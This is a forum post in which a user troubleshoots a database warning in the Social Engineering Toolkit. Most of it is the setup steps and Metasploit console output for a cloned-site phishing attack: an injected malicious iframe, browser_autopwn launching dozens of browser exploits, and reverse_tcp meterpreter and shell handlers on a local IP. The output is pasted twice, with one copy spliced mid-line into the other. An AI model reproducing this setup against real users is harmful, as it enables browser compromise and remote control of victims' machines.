Social Engineering Toolkit issue with Database

General technological topics without their own forum go here

Social Engineering Toolkit issue with Database

Post by sanhedrin on Fri Nov 02, 2012 1:31 am
([msg=70527]see Social Engineering Toolkit issue with Database[/msg])

Hi, I have been working with SET a little bit now and I have come across something on ALL of the SET exploit methods on my computer... I'll go through one example.
BT5 R3 on disk
Ok, so
Code: Select all
cd /pentest/exploits/set/

Code: Select all
/pentest/exploits/set# ./set

Then I go through my options...
1
2
2
1
Code: Select all
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:<my ip>

3 (Google for template)
33 for autopwn
2 for reverse_tcp meterpreter
Code: Select all
set:payloads> Port to use for the reverse [443]:4444

Code: Select all
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

And my problem is here
Code: Select all
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]

[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

It will continue through all of the processes...
Code: Select all
_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use auxiliary/server/browser_autopwn
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 192.168.1.15
LHOST => 192.168.1.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (/pentest/exploits/set/src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (/pentest/exploits/set/src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Auxiliary module running as background job
msf  auxiliary(browser_autopwn) >
[*] Setup
[*] Obfuscating initial javascript 2012-11-02 02:25:14 -0400
[*] Done in 1.755182156 seconds

[*] Starting exploit modules on host 192.168.1.15...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bpWYfPFm
[*]  Local IP: http://192.168.1.15:8080/bpWYfPFm
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UHixYUbc
[*]  Local IP: http://192.168.1.15:8080/UHixYUbc
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/geue
[*]  Local IP: http://192.168.1.15:8080/geue
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/okSedlHtm
[*]  Local IP: http://192.168.1.15:8080/okSedlHtm
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nOQM
[*]  Local IP: http://192.168.1.15:8080/nOQM
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/AaKmPuuiBNna
[*]  Local IP: http://192.168.1.15:8080/AaKmPuuiBNna
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zYUfVOurguHjR
[*]  Local IP: http://192.168.1.15:8080/zYUfVOurguHjR
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/CojtxhQcp
[*]  Local IP: http://192.168.1.15:8080/CojtxhQcp
[*] Server started.
[*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jHPF
[*]  Local IP: http://192.168.1.15:8080/jHPF
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DoKN
[*]  Local IP: http://192.168.1.15:8080/DoKN
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JSNLjxECTNW
[*]  Local IP: http://192.168.1.15:8080/JSNLjxECTNW
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UlrrjTnIZW
[*]  Local IP: http://192.168.1.15:8080/UlrrjTnIZW
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nJMM
[*]  Local IP: http://192.168.1.15:8080/nJMM
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/osligCh
[*]  Local IP: http://192.168.1.15:8080/osligCh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QsXTbEETLRPjY
[*]  Local IP: http://192.168.1.15:8080/QsXTbEETLRPjY
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/cisco_playerpt_setsource with payload windows/meterpreter/reverse_tcp
dslrouter.westell.com - - [02/Nov/2012 02:25:38] "GET / HTTP/1.1" 200 -
                                                                       [*] Using URL: http://0.0.0.0:8080/NDQmLbUDblhFD
[*]  Local IP: http://192.168.1.15:8080/NDQmLbUDblhFD
[*] Server started.
[*] Using URL: http://0.0.0.0:8080/lyTdKlq
[*]  Local IP: http://192.168.1.15:8080/lyTdKlq
[*] Server started.
[*] Starting exploit windows/browser/cisco_playerpt_setsource_surl with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kgdpmykxyiA
[*]  Local IP: http://192.168.1.15:8080/kgdpmykxyiA
[*] Server started.
[*] Starting exploit windows/browser/clear_quest_cqole with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lpCFvI
[*]  Local IP: http://192.168.1.15:8080/lpCFvI
[*] Server started.
[*] Starting exploit windows/browser/ibm_tivoli_pme_activex_bof with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SuKFo
[*]  Local IP: http://192.168.1.15:8080/SuKFo
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/NfRdpt
[*]  Local IP: http://192.168.1.15:8080/NfRdpt
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qAXgJmG
[*]  Local IP: http://192.168.1.15:8080/qAXgJmG
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yeeOypY
[*]  Local IP: http://192.168.1.15:8080/yeeOypY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/exmWTR
[*]  Local IP: http://192.168.1.15:8080/exmWTR
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zLyykbXjOtQYc
[*]  Local IP: http://192.168.1.15:8080/zLyykbXjOtQYc
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bAucDppX
[*]  Local IP: http://192.168.1.15:8080/bAucDppX
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Tueb
[*]  Local IP: http://192.168.1.15:8080/Tueb
[*] Server started.
[*] Starting exploit windows/browser/ms12_004_midi with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/wcCs
[*]  Local IP: http://192.168.1.15:8080/wcCs
[*] Server started.
[*] Starting exploit windows/browser/ms12_037_ie_colspan with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/iRHAM
[*]  Local IP: http://192.168.1.15:8080/iRHAM
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hCrhgmc
[*]  Local IP: http://192.168.1.15:8080/hCrhgmc
[*] Server started.
[*] Starting exploit windows/browser/oracle_autovue_setmarkupmode with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/TOjQIfB
[*]  Local IP: http://192.168.1.15:8080/TOjQIfB
[*] Server started.
[*] Starting exploit windows/browser/tom_sawyer_tsgetx71ex552 with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bfPylfjCuGtd
[*]  Local IP: http://192.168.1.15:8080/bfPylfjCuGtd
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/KZMma_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use auxiliary/server/browser_autopwn
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 192.168.1.15
LHOST => 192.168.1.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (/pentest/exploits/set/src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (/pentest/exploits/set/src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Auxiliary module running as background job
msf  auxiliary(browser_autopwn) >
[*] Setup
[*] Obfuscating initial javascript 2012-11-02 02:25:14 -0400
[*] Done in 1.755182156 seconds

[*] Starting exploit modules on host 192.168.1.15...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bpWYfPFm
[*]  Local IP: http://192.168.1.15:8080/bpWYfPFm
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UHixYUbc
[*]  Local IP: http://192.168.1.15:8080/UHixYUbc
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/geue
[*]  Local IP: http://192.168.1.15:8080/geue
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/okSedlHtm
[*]  Local IP: http://192.168.1.15:8080/okSedlHtm
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nOQM
[*]  Local IP: http://192.168.1.15:8080/nOQM
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/AaKmPuuiBNna
[*]  Local IP: http://192.168.1.15:8080/AaKmPuuiBNna
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zYUfVOurguHjR
[*]  Local IP: http://192.168.1.15:8080/zYUfVOurguHjR
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/CojtxhQcp
[*]  Local IP: http://192.168.1.15:8080/CojtxhQcp
[*] Server started.
[*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jHPF
[*]  Local IP: http://192.168.1.15:8080/jHPF
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DoKN
[*]  Local IP: http://192.168.1.15:8080/DoKN
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JSNLjxECTNW
[*]  Local IP: http://192.168.1.15:8080/JSNLjxECTNW
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UlrrjTnIZW
[*]  Local IP: http://192.168.1.15:8080/UlrrjTnIZW
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nJMM
[*]  Local IP: http://192.168.1.15:8080/nJMM
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/osligCh
[*]  Local IP: http://192.168.1.15:8080/osligCh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QsXTbEETLRPjY
[*]  Local IP: http://192.168.1.15:8080/QsXTbEETLRPjY
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/cisco_playerpt_setsource with payload windows/meterpreter/reverse_tcp
dslrouter.westell.com - - [02/Nov/2012 02:25:38] "GET / HTTP/1.1" 200 -
                                                                       [*] Using URL: http://0.0.0.0:8080/NDQmLbUDblhFD
[*]  Local IP: http://192.168.1.15:8080/NDQmLbUDblhFD
[*] Server started.
[*] Using URL: http://0.0.0.0:8080/lyTdKlq
[*]  Local IP: http://192.168.1.15:8080/lyTdKlq
[*] Server started.
[*] Starting exploit windows/browser/cisco_playerpt_setsource_surl with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kgdpmykxyiA
[*]  Local IP: http://192.168.1.15:8080/kgdpmykxyiA
[*] Server started.
[*] Starting exploit windows/browser/clear_quest_cqole with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lpCFvI
[*]  Local IP: http://192.168.1.15:8080/lpCFvI
[*] Server started.
[*] Starting exploit windows/browser/ibm_tivoli_pme_activex_bof with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SuKFo
[*]  Local IP: http://192.168.1.15:8080/SuKFo
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/NfRdpt
[*]  Local IP: http://192.168.1.15:8080/NfRdpt
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qAXgJmG
[*]  Local IP: http://192.168.1.15:8080/qAXgJmG
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yeeOypY
[*]  Local IP: http://192.168.1.15:8080/yeeOypY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/exmWTR
[*]  Local IP: http://192.168.1.15:8080/exmWTR
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zLyykbXjOtQYc
[*]  Local IP: http://192.168.1.15:8080/zLyykbXjOtQYc
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bAucDppX
[*]  Local IP: http://192.168.1.15:8080/bAucDppX
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Tueb
[*]  Local IP: http://192.168.1.15:8080/Tueb
[*] Server started.
[*] Starting exploit windows/browser/ms12_004_midi with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/wcCs
[*]  Local IP: http://192.168.1.15:8080/wcCs
[*] Server started.
[*] Starting exploit windows/browser/ms12_037_ie_colspan with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/iRHAM
[*]  Local IP: http://192.168.1.15:8080/iRHAM
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hCrhgmc
[*]  Local IP: http://192.168.1.15:8080/hCrhgmc
[*] Server started.
[*] Starting exploit windows/browser/oracle_autovue_setmarkupmode with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/TOjQIfB
[*]  Local IP: http://192.168.1.15:8080/TOjQIfB
[*] Server started.
[*] Starting exploit windows/browser/tom_sawyer_tsgetx71ex552 with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bfPylfjCuGtd
[*]  Local IP: http://192.168.1.15:8080/bfPylfjCuGtd
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/KZMma
[*]  Local IP: http://192.168.1.15:8080/KZMma
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/eShRr
[*]  Local IP: http://192.168.1.15:8080/eShRr
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.1.15:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.1.15:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.1.15:7777
[*] Starting the payload handler...

[*] --- Done, found 34 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.15:8080/
[*] Server started.




I used a local IP as you can see to document all of this, but I am not quite sure how to fix the database issue :?

Help please. I haven't found ANY answers online through search
sanhedrin
New User
New User
 
Posts: 1
Joined: Fri Nov 02, 2012 1:15 am
Blog: View Blog (0)


Return to General

Who is online

Users browsing this forum: No registered users and 0 guests